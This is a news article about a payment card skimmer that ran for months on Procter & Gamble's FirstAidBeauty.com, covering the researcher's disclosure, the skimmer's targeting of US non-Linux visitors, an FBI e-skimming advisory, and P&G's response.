Security Researcher Willem De Groot noted on Oct. 25th that FirstAidBeauty.com was still hosting a malicious Credit Card skimming jquery library on its front-end.
Hacked: @ProcterGamble ‘s https://t.co/qz62iHDazn has had a payment skimmer since May 5th. Fairly advanced: malware does not activate for non-US visitors, or if you run Linux (ie security researchers). pic.twitter.com/HAc7UunK5n
— Willem de Groot (@gwillem) October 25, 2019
Its said that this malicious code was planted on or before May 5th, 2019 and has remained undetected until today.
To make matters worse, Willem De Groot reported the security issues with P&G last week and yet he has received no response as of this writing, noting that are he published his report, the website became unavailable (503 Service Unavailable Code) then shortly after, was back online with the skimmer code removed from their website.
Proctor & Gamble acquired FirstAidBeauty.com in 2018 for an estimated $250 Million USD.
This malicious code was specifically developed to only target USA visitors of the site and skim their credit card information. Furthermore, FirstAidBeauty.com user base is primarily from the USA according to the Similarweb reports, tallying upwards to 80% or more!
On top of this, they’ve had an estimated 485,000 Visitors since May 2019 til Sept. 2019 to their website, which is a conservative estimate from SimilarWeb.com as well!
According to BleepingComputer.com, de Groot spoke on the level of sophistication that this malware code had employed to stay fully undetectable (FUD) for so long, saying that this code went undetected for upwards to 5 months.
“so the level of stealth for this actor is outstanding”, according to Willem De Groot, who had to de-obfuscate and un-encrypt the code in order to even understand what it was doing. He also noted that this code only targeted visitors from the USA and any system NOT running on Linux (to avoid further scrutiny from Security researchers.)
De Groot posted the decoded source code to github on Oct. 25th showing the full source to anyone who wants to see it.
The FBI issued a Press Release on Oct. 22nd about e-skimming that is ramping up through online eCommerce retailers, warning businesses and agencies to ensure all patches and updates are regularly scheduled and deployed, as well changing default login credentials, educating employees with security best practices and advising to segregate/segment critical systems to avoid path/directory and network traversal.
P&G commented after the incident was brought to light giving BleepingComputer this quote:
“Consumer trust is fundamental to us, and we take data privacy very seriously. As soon as we learned about the compromise of the First Aid Beauty site, we moved quickly to take the site down and minimize the impact to our consumers. We are currently investigating the source of the malware and working to identify and notify those consumers who might have been impacted to ensure we provide them the necessary support.”